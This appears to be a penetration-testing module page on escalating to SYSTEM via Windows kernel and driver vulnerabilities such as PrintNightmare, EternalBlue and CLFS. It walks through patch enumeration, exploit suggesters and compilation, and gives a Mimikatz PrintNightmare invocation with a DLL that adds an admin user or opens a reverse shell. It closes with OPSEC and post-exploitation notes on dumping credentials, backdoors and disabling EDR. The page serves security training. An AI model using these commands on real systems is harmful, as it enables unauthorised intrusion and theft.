Back to All Modules

Kernel Exploits (Windows)

#Overview

Windows kernel exploits target vulnerabilities in the Windows kernel or drivers to escalate from user to SYSTEM. Like Linux kernel exploits, these are high-risk, high-reward: they bypass all userland security controls but can cause Blue Screen of Death (BSoD), system instability, or data corruption. Always check the patch level against known CVEs before attempting.

#Prerequisites

  • User-level shell access
  • Knowledge of installed patches (wmic qfe, systeminfo)
  • Exploit suggester tools (WES-NG, Watson)
  • Compilation environment: Visual Studio or MinGW

#Detection & Enumeration

rem List installed hotfixes
wmic qfe get HotFixID
wmic qfe get HotFixID | findstr /i "KB"

rem Full system info (includes hotfix list)
systeminfo
systeminfo | findstr /i "hotfix"

rem Get OS build number
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
CMD
# PowerShell hotfix enumeration
Get-HotFix | Format-Table HotFixID,InstalledOn
Get-HotFix | Where-Object {$_.HotFixID -like "*KB500*"}  # Check specific patch

# Check for specific security update
Get-HotFix -Id KB4540673 -ErrorAction SilentlyContinue
POWERSHELL

#Automated Exploit Suggestion

# WES-NG (Windows Exploit Suggester Next Gen) - on attacker machine
# First, collect systeminfo from target:
systeminfo > systeminfo.txt

# Then run WES-NG:
python3 wes.py systeminfo.txt
python3 wes.py systeminfo.txt --impact "Elevation of Privilege"

# Alternative: Watson (on-target .NET tool)
.\Watson.exe
# Watson enumerates missing patches and suggests exploits

# Sherlock.ps1 (PowerShell, on-target)
. .\Sherlock.ps1
Find-AllVulns
BASH

#Exploitation / Execution

#Compilation Strategy

rem Option 1: Compile on attacker machine with MinGW
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
x86_64-w64-mingw32-gcc exploit.c -o exploit64.exe -lws2_32

rem Option 2: Pre-compiled exploits from repositories
rem Download the appropriate .exe for the target architecture

rem Option 3: Visual Studio project on a Windows VM
rem Build Release x64, transfer to target
CMD

#Common Windows Kernel Exploits

PrintNightmare (CVE-2021-34527 / CVE-2021-1675):

# Printer Spooler RCE -- most common on pre-patched Server 2016/2019
# Check if vulnerable:
Get-Service Spooler | Format-Table Name,Status

# Exploit with Mimikatz or standalone PoC:
.\mimikatz.exe "misc::printnightmare /server:dc01 /library:C:\temp\payload.dll"
# payload.dll is a DLL that creates a local admin user or spawns a reverse shell
POWERSHELL

EternalBlue (CVE-2017-0144 / MS17-010):

# SMBv1 exploit -- affects unpatched Windows 7/2008 R2/2012 R2
# Primarily used for remote exploitation, but can be used post-exploit
# Check if patch is applied:
wmic qfe | findstr KB4012212
BASH

CLFS Driver (CVE-2022-37969 / CVE-2023-28252):

rem Common Log File System driver exploits
rem Affects Windows 10/11 and Server 2019/2022
rem Check patch: KB5012170 or later

rem PoC typically spawns SYSTEM shell via CLFS manipulation
.\CVE-2023-28252.exe
CMD

Named Pipe File System (CVE-2022-21881 / CVE-2022-21999):

rem NPFS vulnerability -- spawns SYSTEM shell
rem Windows 10/11, Server 2019/2022 before Jan 2022
CMD

Windows Print Spooler Elevation (CVE-2022-22718):

rem Another spooler vulnerability, different from PrintNightmare
rem Affects multiple Windows versions
CMD

#Exploit Verification

rem Before running, verify exploit architecture matches OS
systeminfo | findstr "System Type"
rem x64-based PC: use 64-bit exploit
rem x86-based PC: use 32-bit exploit

rem Check if MS17-010 (EternalBlue) patch is applied:
wmic qfe | findstr KB4012212
wmic qfe | findstr KB4012215
rem If neither is listed, system is vulnerable
CMD

#Common Pitfalls

  • Wrong architecture (x86 exploit on x64 OS) -- exploit crashes or fails silently
  • Exploit crashes the system (BSoD) -- always have a backup shell or be prepared to lose access
  • Patches may be applied without changing the OS build number (backported fixes)
  • Exploit binaries from unknown sources may contain backdoors or malware
  • Windows Defender may quarantine the exploit binary before execution
  • CLFS exploits may corrupt filesystem metadata -- can cause persistent issues even after reboot
  • Some exploits require specific compiler flags or runtime libraries (VC++ redistributable)

#OPSEC Considerations

  • Kernel exploits are the noisiest escalation method and almost always trigger AV/EDR.
  • BSoD generates crash dumps, event log entries (event ID 41, 1001), and potential SIEM alerts.
  • Successfully exploited kernel vulnerabilities may be flagged by Microsoft Defender ATP behavioral detection.
  • The wmic qfe command is low noise -- patch enumeration is standard admin behavior.
  • Exploiting patchable kernel bugs on production systems may violate rules of engagement -- confirm scope.
  • Post-exploitation kernel drivers (rootkits) are extremely persistent and difficult to remove -- high forensic impact.

#Post-Exploitation Value

Successful kernel exploitation provides SYSTEM access. From SYSTEM: dump all credentials, install persistent backdoors, modify kernel-level security policies, disable EDR/AV at the kernel level, and move laterally with full machine account privileges.

#Cross-References

#Tool References

ToolLink
WES-NGhttps://github.com/bitsadmin/wesng
Watsonhttps://github.com/rasta-mouse/Watson
Sherlockhttps://github.com/rasta-mouse/Sherlock
Exploit-DBhttps://www.exploit-db.com/

#Source Machines

  • Generic Windows - CVE matching via WES-NG and Watson enumeration